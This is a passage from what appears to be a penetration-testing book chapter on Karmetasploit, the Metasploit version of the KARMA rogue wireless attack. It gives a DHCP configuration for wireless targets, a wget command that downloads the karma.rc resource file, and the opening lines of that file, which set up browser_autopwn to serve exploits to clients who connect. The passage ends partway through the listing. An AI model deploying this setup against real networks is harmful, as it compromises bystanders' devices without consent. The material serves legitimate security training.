Chapter 12
Karmetasploit is the Metasploit Framework implementation of the KARMA attack. It implements various “evil” services including DNS, POP3, IMAP4, SMTP, FTP, SMB, and HTTP. These services accept and respond to most requests from clients and will serve up all kinds of malicious fun. (The various modules are in the modules/auxiliary/server directory of the Metasploit root directory.)
Configuration
Karmetasploit requires very little configuration. To begin, we configure a DHCP server to be used to hand out IP addresses to wireless targets. BackTrack includes a DHCP server, but we will need to create a custom configuration file for it to use with Karmetasploit, as shown in the following listing:
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
We back up our original dhcpd.conf file by entering cp /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.back, and then we create a new file containing the data shown in the listing above, which will serve addresses in the range of 10.0.0.100 to 10.0.0.254. (If you are unfamiliar with DHCP configurations, don’t worry; as long as your new dhcpd.conf looks similar to this it should work fine.)
Next, we download the KARMA resource file, because as of this writing it’s not included in the regular Metasploit trunk:
root@bt:/opt/metasploit3/msf3# wget http://www.offensive-security.com/downloads/karma.rc
When we open the KARMA resource file karma.rc, we can see the sequence of events that occur when it runs, as shown here:
root@bt:/opt/metasploit3/msf3# cat karma.rc
db_connect postgres:toor@127.0.0.1/msfbook
use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads
set LHOST 10.0.0.1
set LPORT 45000